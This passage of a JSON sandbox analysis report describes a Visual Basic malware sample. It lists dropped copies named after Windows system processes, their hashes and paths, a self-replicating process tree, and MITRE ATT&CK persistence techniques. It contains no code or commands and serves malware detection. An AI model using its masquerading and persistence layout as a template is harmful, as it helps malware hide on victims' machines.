"SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 163903, "sha256": "cb59f6e2a462205a73f9ba3ae2c232fdb1586acb96e67d9b53f8aa42664693e3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 163903, "sha256": "d3a5d1a10c2f37df022008b3d493b041bc6698d1bc5cbe3b2c9c5101798bdf73", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINLOGON.EXE", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_path": "%LOCALAPPDATA%\\csrss.exe", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_path": "%LOCALAPPDATA%\\lsass.exe", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_path": "%LOCALAPPDATA%\\services.exe", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_path": "%LOCALAPPDATA%\\smss.exe", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_path": "%LOCALAPPDATA%\\winlogon.exe", "file_size": 163903, "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "%WINDIR%\\D3_08.exe", "file_size": 163903, "sha256": "d3a5d1a10c2f37df022008b3d493b041bc6698d1bc5cbe3b2c9c5101798bdf73", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 163903, "sha256": "153ab06ed1a833f82c573ec825ab6ce2225124cb6dce9416169a32fdc7aa1942", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 163903, "sha256": "5e595ae55dfd82da4a3e8139c7ce6c398d3fd495b93ec3980b3dd2ab99651afa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.exe", "file_path": "C:\\D3_08.exe", "file_size": 163903, "sha256": "9e7ac04eda54414beab000ad37f44a080936e2e5ba6ac51b4f46b5ed48a73b1d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WINLOGON.EXE (PID: 5040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_path": "C:\\D3_08\\New Folder.exe", "file_size": 163903, "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_path": "C:\\Data %OSUSER%.exe", "file_size": 163903, "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe (PID: 3404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4D17.bin", "file_size": 163903, "sha256": "153ab06ed1a833f82c573ec825ab6ce2225124cb6dce9416169a32fdc7aa1942", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 163903, "sha256": "af9ec370536ae157f1f4db600c89b60f9c77f5d8bd6660de7d1e0290e51eb4a1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE48F7.bin", "file_size": 163903, "sha256": "fc5e80d89d3f2f2541e2c08c53407fb2f0fde5fbc1595d0e2f08908e4b426cb7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67EE4660.bin", "file_size": 163903, "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4804.bin", "file_size": 163903, "sha256": "0b64437c440a2477babe2cbf6a0ff26b9a7adb073e56eb9ef2c4e6933a071c36", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE.bin", "file_size": 163903, "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE4D0E.bin", "file_size": 163903, "sha256": "d3a5d1a10c2f37df022008b3d493b041bc6698d1bc5cbe3b2c9c5101798bdf73", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67EE465D.bin", "file_size": 163903, "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00003404", "name": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe", "normalized_path": "C:\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe", "sha256": "05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1"}, {"uid": "00000000-00002520", "parentuid": "00000000-00003404", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6"}, {"uid": "00000000-00002736", "parentuid": "00000000-00002520", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6"}, {"uid": "00000000-00003320", "parentuid": "00000000-00002520", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49"}, {"uid": "00000000-00005040", "parentuid": "00000000-00002520", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ed5cbfbe12f5e40672d8593933ec6fe1d45bc39b8da8650860b623635af408c8"}, {"uid": "00000000-00004808", "parentuid": "00000000-00005040", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6"}, {"uid": "00000000-00005060", "parentuid": "00000000-00005040", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49"}, {"uid": "00000000-00001340", "parentuid": "00000000-00005040", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ed5cbfbe12f5e40672d8593933ec6fe1d45bc39b8da8650860b623635af408c8"}, {"uid": "00000000-00004120", "parentuid": "00000000-00005040", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "acb644f8a28f2513727a10d6badcf1faa4635acbbc327117e74edea7af0b4189"}, {"uid": "00000000-00003420", "parentuid": "00000000-00005040", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005412", "parentuid": "00000000-00005040", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "309ed0ca2035a92dd4cb7a957d50d6487da5585a9356cf6f56cbd9d9e495b23a"}, {"uid": "00000000-00005548", "parentuid": "00000000-00005040", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00002756", "parentuid": "00000000-00002520", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "acb644f8a28f2513727a10d6badcf1faa4635acbbc327117e74edea7af0b4189"}, {"uid": "00000000-00000944", "parentuid": "00000000-00002520", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005116", "parentuid": "00000000-00002520", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "309ed0ca2035a92dd4cb7a957d50d6487da5585a9356cf6f56cbd9d9e495b23a"}, {"uid": "00000000-00005524", "parentuid": "00000000-00005116", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6"}, {"uid": "00000000-00005472", "parentuid": "00000000-00005116", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49"}, {"uid": "00000000-00005932", "parentuid": "00000000-00005116", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ed5cbfbe12f5e40672d8593933ec6fe1d45bc39b8da8650860b623635af408c8"}, {"uid": "00000000-00006036", "parentuid": "00000000-00005116", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "acb644f8a28f2513727a10d6badcf1faa4635acbbc327117e74edea7af0b4189"}, {"uid": "00000000-00006056", "parentuid": "00000000-00005116", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00004272", "parentuid": "00000000-00005116", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "309ed0ca2035a92dd4cb7a957d50d6487da5585a9356cf6f56cbd9d9e495b23a"}, {"uid": "00000000-00005988", "parentuid": "00000000-00005116", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005136", "parentuid": "00000000-00002520", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00002088", "parentuid": "00000000-00003404", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49"}, {"uid": "00000000-00003580", "parentuid": "00000000-00002088", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6"}, {"uid": "00000000-00005064", "parentuid": "00000000-00002088", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49"}, {"uid": "00000000-00005052", "parentuid": "00000000-00002088", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ed5cbfbe12f5e40672d8593933ec6fe1d45bc39b8da8650860b623635af408c8"}, {"uid": "00000000-00004768", "parentuid": "00000000-00002088", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "acb644f8a28f2513727a10d6badcf1faa4635acbbc327117e74edea7af0b4189"}, {"uid": "00000000-00002904", "parentuid": "00000000-00002088", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005404", "parentuid": "00000000-00002088", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "309ed0ca2035a92dd4cb7a957d50d6487da5585a9356cf6f56cbd9d9e495b23a"}, {"uid": "00000000-00005296", "parentuid": "00000000-00002088", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005084", "parentuid": "00000000-00003404", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ed5cbfbe12f5e40672d8593933ec6fe1d45bc39b8da8650860b623635af408c8"}, {"uid": "00000000-00004612", "parentuid": "00000000-00003404", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "acb644f8a28f2513727a10d6badcf1faa4635acbbc327117e74edea7af0b4189"}, {"uid": "00000000-00005240", "parentuid": "00000000-00004612", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6"}, {"uid": "00000000-00002648", "parentuid": "00000000-00004612", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49"}, {"uid": "00000000-00003288", "parentuid": "00000000-00004612", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ed5cbfbe12f5e40672d8593933ec6fe1d45bc39b8da8650860b623635af408c8"}, {"uid": "00000000-00005132", "parentuid": "00000000-00004612", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "acb644f8a28f2513727a10d6badcf1faa4635acbbc327117e74edea7af0b4189"}, {"uid": "00000000-00005940", "parentuid": "00000000-00004612", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00004312", "parentuid": "00000000-00004612", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "309ed0ca2035a92dd4cb7a957d50d6487da5585a9356cf6f56cbd9d9e495b23a"}, {"uid": "00000000-00005992", "parentuid": "00000000-00004612", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005216", "parentuid": "00000000-00003404", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005344", "parentuid": "00000000-00005216", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6"}, {"uid": "00000000-00005172", "parentuid": "00000000-00005216", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49"}, {"uid": "00000000-00005868", "parentuid": "00000000-00005216", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ed5cbfbe12f5e40672d8593933ec6fe1d45bc39b8da8650860b623635af408c8"}, {"uid": "00000000-00004276", "parentuid": "00000000-00005216", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "acb644f8a28f2513727a10d6badcf1faa4635acbbc327117e74edea7af0b4189"}, {"uid": "00000000-00001644", "parentuid": "00000000-00005216", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005772", "parentuid": "00000000-00005216", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "309ed0ca2035a92dd4cb7a957d50d6487da5585a9356cf6f56cbd9d9e495b23a"}, {"uid": "00000000-00006092", "parentuid": "00000000-00005216", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00004716", "parentuid": "00000000-00003404", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "309ed0ca2035a92dd4cb7a957d50d6487da5585a9356cf6f56cbd9d9e495b23a"}, {"uid": "00000000-00003492", "parentuid": "00000000-00003404", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00005844", "parentuid": "00000000-00003492", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "7723b0209865a1700fe01b23cd34e0a23225b060b5a9f5878586be0e1c0b50b6"}, {"uid": "00000000-00004384", "parentuid": "00000000-00003492", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "e92b51e05eb2d964e6e063954e31ee04f1f8ee60dce2ab1b623d255ff3406d49"}, {"uid": "00000000-00002100", "parentuid": "00000000-00003492", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "ed5cbfbe12f5e40672d8593933ec6fe1d45bc39b8da8650860b623635af408c8"}, {"uid": "00000000-00003432", "parentuid": "00000000-00003492", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "acb644f8a28f2513727a10d6badcf1faa4635acbbc327117e74edea7af0b4189"}, {"uid": "00000000-00005808", "parentuid": "00000000-00003492", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "3b27ee29eb15b31e89964441085bbe7fa250f46ae92f0decff78cee31b6e4287"}, {"uid": "00000000-00004544", "parentuid": "00000000-00003404", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "0b64437c440a2477babe2cbf6a0ff26b9a7adb073e56eb9ef2c4e6933a071c36"}, {"uid": "00000000-00004320", "parentuid": "00000000-00004544", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "0b64437c440a2477babe2cbf6a0ff26b9a7adb073e56eb9ef2c4e6933a071c36"}, {"uid": "00000000-00003440", "parentuid": "00000000-00004544", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc5e80d89d3f2f2541e2c08c53407fb2f0fde5fbc1595d0e2f08908e4b426cb7"}, {"uid": "00000000-00002232", "parentuid": "00000000-00004544", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "eca29845d3e48082e3b9ccaf990b2ffd9293b10ff25f7e998012de2270148a81"}, {"uid": "00000000-00003204", "parentuid": "00000000-00003404", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc5e80d89d3f2f2541e2c08c53407fb2f0fde5fbc1595d0e2f08908e4b426cb7"}, {"uid": "00000000-00002792", "parentuid": "00000000-00003204", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "0b64437c440a2477babe2cbf6a0ff26b9a7adb073e56eb9ef2c4e6933a071c36"}, {"uid": "00000000-00003824", "parentuid": "00000000-00003204", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc5e80d89d3f2f2541e2c08c53407fb2f0fde5fbc1595d0e2f08908e4b426cb7"}, {"uid": "00000000-00001904", "parentuid": "00000000-00003404", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "eca29845d3e48082e3b9ccaf990b2ffd9293b10ff25f7e998012de2270148a81"}, {"uid": "00000000-00005760", "parentuid": "00000000-00003404", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "af9ec370536ae157f1f4db600c89b60f9c77f5d8bd6660de7d1e0290e51eb4a1"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Change Default File Association", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001", "malicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Screensaver", "attck_id": "T1546.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege 